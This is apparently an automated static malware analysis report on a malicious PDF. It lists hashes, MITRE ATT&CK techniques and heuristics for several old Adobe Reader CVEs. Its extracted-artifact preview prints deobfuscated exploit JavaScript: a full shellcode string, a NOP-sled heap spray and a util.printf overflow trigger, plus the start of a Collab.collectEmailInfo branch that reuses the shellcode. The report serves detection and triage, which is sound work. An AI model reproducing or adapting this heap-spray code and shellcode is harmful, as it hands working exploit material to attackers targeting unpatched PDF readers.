Malicious PDF — malware analysis report

Static analysis result for SHA-256 604ec663632b4952…

Verdict: MALICIOUS
File type: PDF
Size: 118.6 KB
MD5: ac28139f934582cf593b0f98de0b7d03
SHA-1: da42ff819d2536f5ce8cce73439fb0cfe8cc93f8
SHA-256: 604ec663632b495258f9709ee9cbf759013adb8433f0bb18b113a2143002ba64
Risk Score: 616

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits multiple known vulnerabilities in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script acts as a dispatcher, decoding and executing exploit code likely intended to download and run a further malicious payload. The presence of multiple exploit CVEs and the use of JavaScript strongly indicate a malicious exploit document.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 [critical, CVE, exact match, CVE_2009_4324]
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 [critical, CVE, exact match, CVE_2009_0927]
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE, exact match, CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 [critical, CVE, exact match, CVE_2008_2992]
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher [critical, CVE, likely match, PDF_PIDIEF_MULTI_CVE_DISPATCH]
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit [critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT]
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action [low, 3 related findings, PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical, PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager [high, PDF_JS_LARGE_COMMENT_PADDED_EVAL]
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream [low, PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0006_000.js
SHA-256: 20407ca5b840296aa4712e2db91bf9168d294c0534cbf8d6c0deac61ffc3f550
Kind: pdf-javascript-stream
Source: PDF /JS object 6 at offset 0x143
Size: 626908 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function cJJ(gYy){ /*
... (truncated)
Filename: legacy_pdfkit_stage_000.js
SHA-256: 571b8e0add7af0bbc9451791482f6d2565d77365ddf86b8e1f8f2a789babf278
Kind: deobfuscated-js
Source: comment-padded substitution-hex decoded JavaScript at offset 0x143
Size: 10413 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE0FF%u22AC%u8404%u120D%uE004%uA9AC%uEC44%u5227%u4D18%u5227%u610C%u2268%u1FF3%uA953%u5BE8%u22E4%uE004%u22C6%u6E6C%u2CE2%u88E8%uDC34%uEE8E%uCDC4%u00CA%u4ACC%u2A37%u7926%uD86C%u8E8E%u88E3%u6B46%u088E%uF9C4%uC38E%u4A45%uAC5F%uFFB6%u0C6C%u213B%u0808%u23B3%uE004%u2625%u632F%u2647%u200F%uD3D9%u8E6C%u56C9%u8804%u4BDB%u896A%uDDF8%uC851%u7BF5%u200F%uA6A3%uE0FC%u22AC%u108F%u7A17%uE004%u48AC%u8804%u6685%uB7EC%u6BC4%uEFE9%u4AD2%uAB8F%u7D4F%u00EC%u22AC%u6904%u09A8%u0B87%u29A8%u95C4%uAF5D%uE081%u22AE%uB004%uDDC4%uE004%uDDAC%uD451%uA721%uE404%u22AC%u8A54%u48AC%u6D04%u2229%uE006%u72AC%uB5FB%uAF94%uE0B1%u22A8%u4C04%uE2A6%u1B71%uE5E2%uCE02%u5AC9%u2761%u26EA%uE004%u22AC%u6589%u26AC%uE004%uEB9F%uB055%u7753%uA038%uA6A3%uE084%u22AC%u694C%u6EE9%uE06C%u22EC%u8A04%uDDEC%uA851%uE2A7%u8E70%u6725%u8A64%u48AC%u8A04%u48AC%u8A04%uDDAC%uB051%uE2A7%uBA70%u22C6%uE06C%u22AC%u8A00%u48AC%u0904%u2206%uE004%uDDFC%uB451%uE2A7%uA270%u6725%u6D6C%u46E9%u8854%u62AC%uE004%u5753%u1F64%u4AD9%uB5FB%u29F4%u94C4%uA9B9%u8441%uE2A7%uEE70%u5753%u1F60%u42D9%u95FB%uDDE0%uA051%uF747%u95FB%uDDE0%uA451%uEB87%uB145%uA721%uE404%u22AC%u1F54%u0EF9%u1F6E%u7753%uB534%uCE27%u9D8F%u29A4%u94FB%u71E7%u3E8F%uA9FA%uDC77%u5627%u9837%uD1AF%u6B52%u02DA%u1307%uEB9F%uA14D%u2101%uB6C7%uD49F%u5E0B%u1ABC%u94D2%uE3A4%uEDCA%uD0AF%u0B44%u195D%uBEFA%uC7D9%u6B5E%uA947%uC45E%uFFAF%u6B62%u69A0%uBA8F%u21B0%u6BD9%uA9A8%u2507%u79F2%uE2EF%uE29F%u2259%u22A8%uB1EC%uDD53%u88FB%u56D8%uDA74%u0D83%u9365%u43C5%u906A%u50C3%u946A%u4BDE%uCE74%u4DCF%uCF69%u50D8%u8465%u0DC9%u833B%u1391%u9322%u46C5%u8139%u1094%u8233%u1A9F%uD667%u449F%uD462%u179D%u8134%u13C8%uD760%u479C%u863C%u17CA%u8537%u47CA%uC636%u1FDF%uE037%u22AC%u0004");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE0FF%u22AC%u8404%u120D%uE004%uA9AC%uEC44%u5227%u4D18%u5227%u610C%u2268%u1FF3%uA953%u5BE8%u22E4%uE004%u22C6%u6E6C%u2CE2%u88E8%uDC34%uEE8E%uCDC4%u00CA%u4ACC%u2A37%u7926%uD86C%u8E8E%u88E3%u6B46%u088E%uF9C4%uC38E%u4A45%uAC5F%uFFB6%u0C6C%u213B%u0808%u23B3%uE004%u2625%u632F%u2647%u200F%uD3D9%u8E6C%u56C9%u8804%u4BDB%u896A%uDDF8%uC851%u7BF5%u200F%uA6A3%uE0FC%u22AC%u108F%u7A17%uE004%u48AC%u8804%u6685%uB7EC%u6BC4%uEFE9%u4AD2%uAB8F%u7D4F%u00EC%u22AC%u6904%u09A8%u0B87%u29A8%u95C4%uAF5D%uE081%u22AE%uB004%uDDC4%uE004%uDDAC%uD451%uA721%uE404%u22AC%u8A54%u48AC%u6D04%u2229%uE006%u72AC%uB5FB%uAF94%uE0B1%u22A8%u4C04%uE2A6%u1B71%uE5E2%uCE02%u5AC9%u2761%u26EA%uE004%u22AC%u6589%u26AC%uE004%uEB9F%uB055%u7753%uA038%uA6A3%uE084%u22AC%u694C%u6EE9%uE06C%u22EC%u8A04%uDDEC%uA851%uE2A7%u8E70%u6725%u8A64%u48AC%u8A04%u48AC%u8A04%uDDAC%uB051%uE2A7%uBA70%u22C6%uE06C%u22AC%u8A00%u48AC%u0904%u2206%uE004%uDDFC%uB451%uE2A7%uA270%u6725%u6D6C%u46E9%u8854%u62AC%uE004%u5753%u1F64%u4AD9%uB5FB%u29F4%u94C4%uA9B9%u8441%uE2A7%uEE70%u5753%u1F60%u42D9%u95FB%uDDE0%uA051%uF747%u95FB%uDDE0%uA451%uEB87%uB145%uA721%uE404%u22AC%u1F54%u0EF9%u1F6E%u7753%uB534%uCE27%u9D8F%u29A4%u94FB
... (truncated)